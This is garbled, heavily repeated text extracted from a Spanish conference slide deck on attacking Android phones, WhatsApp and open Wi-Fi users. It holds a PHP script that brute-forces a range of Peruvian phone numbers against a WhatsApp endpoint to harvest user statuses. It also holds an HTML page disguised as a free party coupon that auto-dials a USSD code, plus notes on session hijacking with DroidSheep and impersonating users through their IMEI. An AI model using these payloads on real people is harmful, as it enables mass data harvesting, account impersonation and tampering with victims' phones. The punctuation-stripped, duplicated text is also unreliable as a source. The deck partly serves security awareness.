Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 11: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/11.jpg)
Atacando Windows
USO DE NMAP
SCANEO DE PUERTOS
DETECCIOacuteN DE SIST OPERATIVO
SCRIPT DE VERIFICACIOacuteN DE
VULNERABILIDADES
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 12: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/12.jpg)
Atacando Windows
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 13: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/13.jpg)
Atacando una red LAN
bull Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook Hotmail Twitter)
bull El coacutedigo fuente es libre httpdroidsheepde
bull Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear WTF
bull La comunidad XDA-developers sigue sacando nuevas versiones del software (httpforumxda-developerscom)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
Algunos coacutedigos USSD no necesitan la intervencioacuten de ldquomarcadordquo para ser ejecutados simplemente se ejecutan pueden probar esto
06 Entonces que pasa sihelliphellip
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
Revisa el coacutedigo QR
imprime el cupoacuten y
entra gratis a la
fiesta
EL ATAQUE
lthtmlgt ltheadgt lttitlegtFiesta LimaHack 2012lttitlegt ltmeta http-equiv=Refresh content=0url=tel 2797385523 gt ltheadgtltbodygt lthtmlgt
Aplicaciones APK Maliciosas
gt Se han heredado todas las malas costumbres del mundo Windoneano todos instamos dando NEXT NEXT NEXT gt iquestSabemos lo que realmente estamos instalando en nuestro celular
Google Play y la poliacuteticahellip
Informacioacuten personal y confidencial no se permite la divulgacioacuten o la publicacioacuten no autorizada de informacioacuten de caraacutecter privado o confidencial de los usuarios (como nuacutemeros de tarjetas de creacutedito de la Seguridad Social del permiso de conducir o de otros documentos ) ni de cualquier otra informacioacuten que no sea de acceso puacuteblico
El problema es que NADIE lo verifica httpplaygooglecomintlALL_esaboutdeveloper-
content-policyhtml
Instalaremos una aplicacioacuten
httpsplaygooglecomstoreappsdetailsid=comelpalomoreservations
Google Play y la poliacuteticahellip
Antes de instalar el APK httpwwwel-palomocomlimahackreservationstxt Despueacutes de instalar httpwwwel-palomocomlimahackreservationstxt Creacuteditos
billygradosgmailcom Developer de aplicaciones para
Android
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
Google Play y la poliacuteticahellip
EL ATAQUE
Conclusiones
Android es una herramienta muy potente para realizar pruebas baacutesicas de penetracioacuten de sistemas a nivel de sistema operativo y redes LAN
WhatsApp presenta debilidades de seguridad de informacioacuten
importantes El celular nunca se presta Nunca Existen diversas vulnerabilidades en sistemas Android Coacutedigos USSD y a
traveacutes de Metasploit para versiones antiguas de Android Google Play tiene una poliacutetica de seguridad de informacioacuten sin embargo
no verifica que las aplicaciones cumplan con dicha poliacutetica Actualiza tu Android verifica los permisos otorgados a cada aplicacioacuten y
no instales APK files de dudosa procedencia
![Page 14: Presentación de PowerPoint - | Blog de Omar Android... · Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR](https://reader031.vdocuments.pub/reader031/viewer/2022030908/5b508ba97f8b9a166e8ec66a/html5/thumbnails/14.jpg)
Atacando una red LAN
Funcionamiento Session Hijacking
1
El usuario ha ingresado normalmente a una aplicacioacuten web comercial o corporativo como bull Hotmail bull Facebook bull Twitter
DROIDSHEEP capturas las cookies asociadas a la sesioacuten creada y las utiliza No es necesario capturar la contrasentildea
2
Atacando una red LAN Funcionamiento Session Hijacking
bull Droidsheep reconoce las cookies de aplicaciones como
Facebook y Hotmail ademaacutes te puedes enviar las
cookies por correo electroacutenico
Atacando una red LAN
Anaacutelisis de Traacutefico Android
bull Cada vez utilizamos nuestros
celulares para conectarnos a
Internet
bull La mayoriacutea de las personas
se conecta a redes wireless
abiertas Como TUacute
bull Muchas aplicaciones no
encriptan la informacioacuten que
enviacutean las enviacutean en texto
plano
iquestPor queacute es interesante analizar el traacutefico de redhellip
iquestPor queacute es interesante analizar el traacutefico de redhellip
Anaacutelisis de traacutefico - Whatsapp
bull Whatsapp se ha convertido en un mecanismo para el enviacuteo de mensajes muy popular
bull Es muy parecido a los SMS pero gratuito (hasta el momento)
bull Tiene serios problemas para dar seguridad a la informacioacuten que enviacutea hacia internet porque enviaba todo en texto claro
bull Ahora enviacutea la informacioacuten con un HASH MD5
Perohellip es soacutelo un simple MD5
bull Whatsapp tiene serios problemas de seguridad
analicemos
Cada vez que Whatsapp inicia debe verificar si tus
contactos cuentan con una cuenta activada
Para eso se conecta a una URL y consulta el estado
de tus contactos por ejemplo
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=ltAgtampme=ltBgtampu[]=ltCgt
ltAgtCoacutedigo de paiacutes del nuacutemero a consultar
ltBgt Nuacutemero a consultar
ltCgt Cualquier nuacutemero de WhatsApp (o el mismo nuacutemero)
Perohellip es soacutelo un simple MD5
Estado y mensaje del Whatsapp
Nuacutemero del teleacutefono consultado
Nuacutemero del teleacutefono consultado
iquestCuaacutenta gente tiene Whatsapp en el Peruacute
bull El ministerio de transportes y comunicaciones nos daraacute
una manito
Script para la verificacioacuten de usuarios y estado en Whatsapp
AQUIacute VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR
ltphp
mysql_connect(localhostrootldquopassword)
mysql_select_db(limahakc2012)
for($i=970000000 $ilt=979999999$i++)
$whatsapp =httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=$iampu[]=$i
$ch = curl_init()
curl_setopt($ch CURLOPT_RETURNTRANSFER 1)
curl_setopt($chCURLOPT_USERAGENTWhatsApp267 iPhone_OS501 DeviceUnknown_(iPhone41))
curl_setopt($ch CURLOPT_URL $whatsapp)
$cuerpo = curl_exec($ch)
curl_close($ch)
if (preg_match(ltkeygt$cuerpo))
$explodeo_datos = explode(ltdictgt$cuerpo)
$explodeo_estado = explode(ltkeygtSltkeygt$explodeo_datos[1])
$explodeo_estado = explode(ltkeygtJIDltkeygt$explodeo_estado[1])
$query1 =insert into WhatsApp_users3 (numeromensajestatus) values ($i$$explodeo_estado[0]1)
mysql_query($query1)
gt
httpssrowhatsappnetclientiphoneiqphpcd=1ampcc=51ampme=973861650ampu[]=973861650
EL ATAQUE
iquestCoacutemo enviacutea Whatsapp los mensajes
bull WhatsApp tiene un mecanismo de autenticacioacuten basado en SASL DIGEST ndash MD5
bull Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password pero obviamente el password no se enviacutea ya que sirve para generar el CHALLENGE (MD5)
bull iquestPASSWORD Pero si nunca pusimos un password
bull El password es
bull Android IME (International Mobile Equipment Identity)
bull Iphone y otros la MAC
WhatsApp - API
bull API no oficial de WhatsApp
bull Estaacute bajo licencia MIT ndash refer to the source code for the
extra line
INGENIERIA REVERSA
El ataque obteniendo el IMEI
bull Si obtenemos el IMEI podemos suplantar una identidad de
alguien y ademas recibir sus mensajes
bull OJO Si te haces pasar por esa persona y recibes los
mensajes la verdadera persona no los recibiraacute
bull Moraleja
ldquoEl celular es como el calzoncillo hellip
No se presta a nadiehellip a nadierdquo
EL ATAQUE
Atacando Android
Atacando Android
bull Utilizaremos el Android Virtual
Device para hacer nuestras
pruebas
bull El objetivo es obtener
informacioacuten sensible de los
teleacutefonos celulares
bull Lo maacutes importante es tener
actualizado siempre el celular
bull A veces no basta con tenerlo
actualizado porque soacutelo se sacan
actualizaciones para los uacuteltimos
modelos
Atacando Android
bull Utilizaremos un moacutedulo auxiliar de Metasploit para realizar
el ataque
Atacando Android
EL ATAQUE
Coacutedigos USSD
El USSD (acroacutenimo de Unstructured Supplementary Service Data Servicio Suplementario de Datos no Estructurados en ingleacutes) es un servicio para el enviacuteo de datos a traveacutes de moacuteviles GSM al igual que el SMS Es usado normalmente para comunicacioacuten con el proveedor de telefoniacutea generalmente para servicios de mensajeriacutea en tiempo real
Aquiacute algunos coacutedigos USSD 06 150 27673855 (no deberiacuteas ejecutar este)
Coacutedigos USSD
Asiacute como existe los links para enviar correo lta mailtomailmailcom helliphellipgt Enviar email ltagt
Tambieacuten existe el mail para ldquoLLAMARrdquo lta href=tel987654321gtllamar LIMAHACKltagt
